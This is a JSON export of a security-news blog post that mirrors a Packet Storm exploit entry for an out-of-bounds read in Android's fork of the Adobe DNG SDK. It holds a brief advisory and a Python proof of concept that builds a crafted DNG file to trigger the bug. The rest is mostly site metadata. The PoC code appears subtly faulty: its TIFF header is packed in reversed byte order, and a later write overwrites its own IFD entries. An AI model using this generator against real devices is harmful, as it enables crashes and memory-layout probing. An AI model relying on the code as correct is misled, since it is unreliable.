{"id":28578,"date":"2025-12-03T18:50:33","date_gmt":"2025-12-03T18:50:33","guid":{"rendered":"http:\/\/localhost\/?p=28578"},"modified":"2025-12-03T18:50:33","modified_gmt":"2025-12-03T18:50:33","slug":"adobe-dng-sdk-14-out-of-bounds-read","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28578","title":{"rendered":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379"},"content":{"rendered":"

{“lastseen”:”2025-12-03T17:20:48″,”description”:”A vulnerability exists in Adobe DNG SDK the fork used by Android due to improper validation of the fAreaSpec fields inside the dngopcodeDeltaPerRow::ProcessArea function. If an attacker supplies a crafted DNG file with an empty or malformed fAreaSpec,…”,”published”:”2025-12-03T00:00:00″,”modified”:”2025-12-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:212379″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Adobe DNG SDK v1.4 (Android\u2019s fork) Out-of-Bounds Read |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/cs.android.com\/android\/platform\/superproject\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/207365\/\\n \\n [+] Summary : \\n \\n A vulnerability exists in Adobe DNG SDK (the fork used by Android) due to improper validation of the fAreaSpec fields inside the dng_opcode_DeltaPerRow::ProcessArea function. \\n \\t\\t If an attacker supplies a crafted DNG file with an empty or malformed fAreaSpec, the SDK performs arithmetic that results in signed integer underflow. \\n \\t\\t This underflow leads to an out\u2011of\u2011bounds read when computing the lookup table pointer.\\n Because the DNG SDK is widely used in Android\u2019s raw\u2011image pipeline (BuildImageStage2), the bug becomes reachable from remote contexts that process untrusted DNG images. \\n \\t\\t The vulnerability can result in a crash and may enable ASLR bypass, since observable differences in behavior depend on memory layout.\\n Android has shipped this vulnerable DNG fork for over 12 years, affecting multiple generations of devices.\\n \\n [+] Affected Version : Adobe DNG SDK v1.4 (Android\u2019s fork)\\n \\n All Android versions using this fork, including:\\n Android 15\\n Android 14\\n Android 13\\n And earlier versions\\n \\n [+] POC : python poc.py ===\\u003e Python version to generate the malicious DNG:\\n \\n import struct\\n \\n def create_malicious_dng(filename):\\n with open(filename, ‘wb’) as f:\\n # TIFF Header\\n f.write(struct.pack(‘\\u003cI’, 0x49492A00)) # Little endian\\n f.write(struct.pack(‘\\u003cI’, 8)) # First IFD offset\\n \\n # IFD with 3 entries\\n f.write(struct.pack(‘\\u003cH’, 3)) # 3 entries\\n \\n # Minimal required IFD entries\\n entries = [\\n (256, 4, 1, 64), # ImageWidth\\n (257, 4, 1, 64), # ImageLength\\n (51011, 7, 60, 128), # OpcodeList3 at offset 128\\n ]\\n \\n for tag, type, count, value in entries:\\n f.write(struct.pack(‘\\u003cHHII’, tag, type, count, value))\\n \\n f.write(struct.pack(‘\\u003cI’, 0)) # Next IFD (0 = end)\\n \\n # Write some dummy image data at offset 24\\n f.seek(24)\\n f.write(b’\\\\x00′ * 100)\\n \\n # Write malicious opcode at offset 128\\n f.seek(128)\\n \\n # DeltaPerRow opcode – 11 parameters total\\n opcode_params = [\\n 0x0002, # opcode_id: DeltaPerRow\\n 1, # version\\n 0, # flags\\n 100, # top – VULNERABILITY TRIGGER\\n 0, # left\\n 50, # bottom – top \\u003e= bottom makes fAreaSpec empty\\n 64, # right\\n 1, # row_pitch\\n 1, # col_pitch\\n 0, # plane\\n 1 # planes\\n ]\\n \\n # Pack each parameter individually to avoid format string issues\\n for param in opcode_params:\\n f.write(struct.pack(‘\\u003cI’, param))\\n \\n # Table size and data\\n table_size = 50 # Small table to ensure OOB read\\n f.write(struct.pack(‘\\u003cI’, table_size))\\n \\n # Write table data\\n for i in range(table_size):\\n f.write(struct.pack(‘\\u003cf’, 0.1))\\n \\n print(f\\”Malicious DNG created: {filename}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n create_malicious_dng(\\”poc.dng\\”)\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212379″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212379\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-03T17:20:48″,”description”:”A vulnerability exists in Adobe DNG SDK the fork used by Android due to improper validation of the fAreaSpec fields inside the dngopcodeDeltaPerRow::ProcessArea function. If…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-28578","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28578\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-03T17:20:48″,”description”:”A vulnerability exists in Adobe DNG SDK the fork used by Android due to improper validation of the fAreaSpec fields inside the dngopcodeDeltaPerRow::ProcessArea function. If...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28578\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-03T18:50:33+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379\",\"datePublished\":\"2025-12-03T18:50:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"},\"wordCount\":660,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\",\"name\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-03T18:50:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28578\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28578#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28578","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem","og_description":"{“lastseen”:”2025-12-03T17:20:48″,”description”:”A vulnerability exists in Adobe DNG SDK the fork used by Android due to improper validation of the fAreaSpec fields inside the dngopcodeDeltaPerRow::ProcessArea function. If...","og_url":"https:\/\/zero.redgem.net\/?p=28578","og_site_name":"zero redgem","article_published_time":"2025-12-03T18:50:33+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28578#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28578"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379","datePublished":"2025-12-03T18:50:33+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28578"},"wordCount":660,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28578#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28578","url":"https:\/\/zero.redgem.net\/?p=28578","name":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-03T18:50:33+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28578#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28578"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28578#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Adobe DNG SDK 1.4 Out-Of-Bounds Read_PACKETSTORM:212379"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28578","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28578"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28578\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}